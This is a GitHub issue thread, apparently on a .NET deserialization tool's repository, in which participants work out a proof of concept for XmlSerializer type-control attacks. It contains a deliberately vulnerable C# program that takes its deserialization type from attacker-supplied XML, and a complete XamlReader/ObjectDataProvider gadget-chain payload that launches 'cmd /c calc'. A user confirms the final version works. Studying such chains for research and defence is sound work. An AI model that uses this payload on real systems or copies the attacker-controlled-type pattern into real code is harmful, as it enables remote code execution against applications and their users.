Closed vah13 closed 5 years ago
pwntester
commented
5 years ago Hi,
For XmlSerializer to be vulnerable, attacker needs to be able to control expected type:
XmlSerializer xmlSerializer = new XmlSerializer(<attacker controllable>, "http://web.com/a");Cheers, A
adon90
commented
5 years ago Hey, I am doing tests with Visual Studio and I haven't managed to create a vulnerable XmlSerializer code from scratch, please, send me a simple vulnerable project or point me in the right direction, the one I am using is this one:
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Xml.Serialization;
namespace WindowsFormsApplication3
{
[XmlRoot]
public class TestClass
{
public string classname;
private string name;
private int age;
[XmlAttribute]
public string Classname { get { return classname; } set { classname = value; } }
[XmlElement]
public string Name { get { return name; } set { name = value; } }
[XmlElement]
public int Age { get { return age; } set { age = value; } }
public override string ToString()
{
return base.ToString();
}
}
class Program
{
static void Main(string[] args)
{
TestClass testClass = new TestClass();
using (var stream = new FileStream(@"d:\1.xml", FileMode.Open))
{
var serializers = new XmlSerializer(typeof(TestClass));
testClass = serializers.Deserialize(stream) as TestClass;
}
MessageBox.Show(testClass.Name);
}
}
}
But I think that class doesn't meet the conditions, I would appreciate some help, thanks
adon90
commented
5 years ago This is the payload I am using:
<?xml version="1.0" encoding="utf-8"?>
<ExpandedWrapperOfTestClassObjetDataProvider xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<ProjectedProperty0>
<ObjectInstance xsi:type="TestClass">
<Age>0</Age>
<MethodName><ClassMethod</MethodName>
<MethodParameters>
<anyType xsi:type="xsd:string">calc.exe</anyType>
</MethodParameters>
<ProjectedProperty0>
</ExpandedWrapperOfTestClassObjetDataProvider>Check slide 47 here: https://www.blackhat.com/docs/us-17/thursday/us-17-Munoz-Friday-The-13th-Json-Attacks.pdf
Attacker needs to be able to control expected type as DNN was doing here: https://github.com/dnnsoftware/Dnn.Platform/blob/a142594a0c18a589cb5fb913a022eebe34549a8f/DNN%20Platform/Library/Common/Utilities/XmlUtils.cs#L201
adon90
commented
5 years ago Hello Alvaro, thank you very much, but, if that's not too much to ask for, could you please provide me a complete code I can just use straightforward not parts of code? Thanks
adon90
commented
5 years ago This is my code now, if you tell me how to set the "miau.xml" payload up based on the code to test a command execution, would be epic. Thanks!!!
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Threading.Tasks;
using System.Windows.Forms;
using System.Xml;
using System.Xml.Serialization;
namespace WindowsFormsApplication3
{
class Program
{
static void Main(string[] args)
{
var xmlDoc = new XmlDocument();
xmlDoc.LoadXml("miau.xml");
foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/item")) {
string typeName = xmlItem.GetAttribute("type");
var xser = new XmlSerializer(Type.GetType(typeName));
}
}
}
}
pwntester
commented
5 years ago Just make the argument to XmlSerializer to take a type derived from a string controlled by the attacker. Check the new RCE found on Sharepoint for another example:
pwntester
commented
5 years ago Havent tried it but should be something like:
namespace WindowsFormsApplication3
{
class Program
{
static void Main(string[] args)
{
var xmlDoc = new XmlDocument();
xmlDoc.LoadXml("miau.xml");
foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/root")) {
string typeName = xmlItem.GetAttribute("type");
var xser = new XmlSerializer(Type.GetType(typeName));
var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
xser.Deserialize(reader);
}
}
}
}And then miau.xml should be the one you generated:
<?xml version="1.0"?>
<root xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" type="System.Data.Services.Internal.ExpandedWrapper`2[[System.Windows.Markup.XamlReader, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35],[System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35]], System.Data.Services, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089">
<ExpandedWrapperOfXamlReaderObjectDataProvider>
<ExpandedElement/>
<ProjectedProperty0>
<MethodName>Parse</MethodName>
<MethodParameters>
<anyType xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xsi:type="xsd:string">
<ResourceDictionary xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml" xmlns:System="clr-namespace:System;assembly=mscorlib" xmlns:Diag="clr-namespace:System.Diagnostics;assembly=system">
<ObjectDataProvider x:Key="LaunchCmd" ObjectType="{x:Type Diag:Process}" MethodName="Start">
<ObjectDataProvider.MethodParameters>
<System:String>cmd</System:String>
<System:String>/c calc</System:String>
</ObjectDataProvider.MethodParameters>
</ObjectDataProvider>
</ResourceDictionary>
</anyType>
</MethodParameters>
<ObjectInstance xsi:type="XamlReader"></ObjectInstance>
</ProjectedProperty0>
</ExpandedWrapperOfXamlReaderObjectDataProvider>
</root>Muchas gracias Alvaro por ese codigo de verdad que me ha costado bastante encontrar una PoC así y que funcione bien sin necesitar 1000 clases y mierdas asi que te lo agradezco, el codigo definitivo con los imports y un pequeño fallo que tenia al cargar el XML es este:
using System;
using System.Collections.Generic;
using System.IO;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Xml;
using System.Xml.Serialization;
namespace XMLDoc
{
class Program
{
static void Main(string[] args)
{
var xmlDoc = new XmlDocument();
xmlDoc.Load(@"d:\miau.xml");
foreach (XmlElement xmlItem in xmlDoc.SelectNodes("/root"))
{
string typeName = xmlItem.GetAttribute("type");
Console.WriteLine(typeName);
var xser = new XmlSerializer(Type.GetType(typeName));
var reader = new XmlTextReader(new StringReader(xmlItem.InnerXml));
xser.Deserialize(reader);
}
}
}
}
;)!
Hi there, I have this .NET code
I generated this XML PoC
during deserialization I'm getting this error
could you help me, how can I fix it? why am I getting this error?